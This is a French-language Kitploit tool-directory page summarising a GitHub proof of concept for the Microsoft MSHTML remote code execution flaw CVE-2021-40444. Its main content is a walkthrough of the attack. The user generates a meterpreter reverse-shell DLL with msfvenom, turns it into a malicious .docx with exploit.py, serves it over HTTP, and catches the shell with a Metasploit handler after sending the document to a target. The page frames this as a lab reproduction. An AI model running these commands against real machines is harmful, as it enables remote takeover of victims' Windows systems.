Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-40444-POC — Tentative de reproduction de la vulnérabilité Microsoft MSHTML Remote Code Execution (RCE) à l'aide de Metasploit Framework. | Kitploit
Outils/GitHubGitHub/kagura-maru/cve-2021-40444-poc
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Tentative de reproduction de la vulnérabilité Microsoft MSHTML Remote Code Execution (RCE) à l'aide de Metasploit Framework.

Voir le dépôt
1013il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-40444-POC

Une tentative de reproduction de la vulnérabilité d'exécution de code à distance (RCE) Microsoft MSHTML en utilisant Metasploit Framework.

Fonctionne mieux si elle n'est pas exécutée dans FlareVM

PRÉPARATION

Clonez le dépôt depuis https://github.com/lockedbyte/CVE-2021-40444

Préparez le modèle .dll à utiliser plus tard avec msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

Copiez le template.dll récemment produit dans le dossier test/ du dépôt Donnez la permission d'exécution au template.dll par chmod +x template.dll

Exécutez le script pour utiliser le template.dll et le transformer en output python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

ÉCOUTEUR

Le document sera ensuite exporté dans le dossier out/ et nous pouvons configurer un écouteur sur notre port HTTP (par défaut 80) python3 exploit.py host 80

Lancez metasploit avec msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

CHARGE UTILE

Ensuite, nous pouvons envoyer le document.docx à notre machine vulnérable et exécuter le .docx

Nous obtiendrons une réponse dans le terminal de exploit.py et le laboratoire est réussi si nous parvenons à générer un shell reverse tcp.

Télécharger l’outil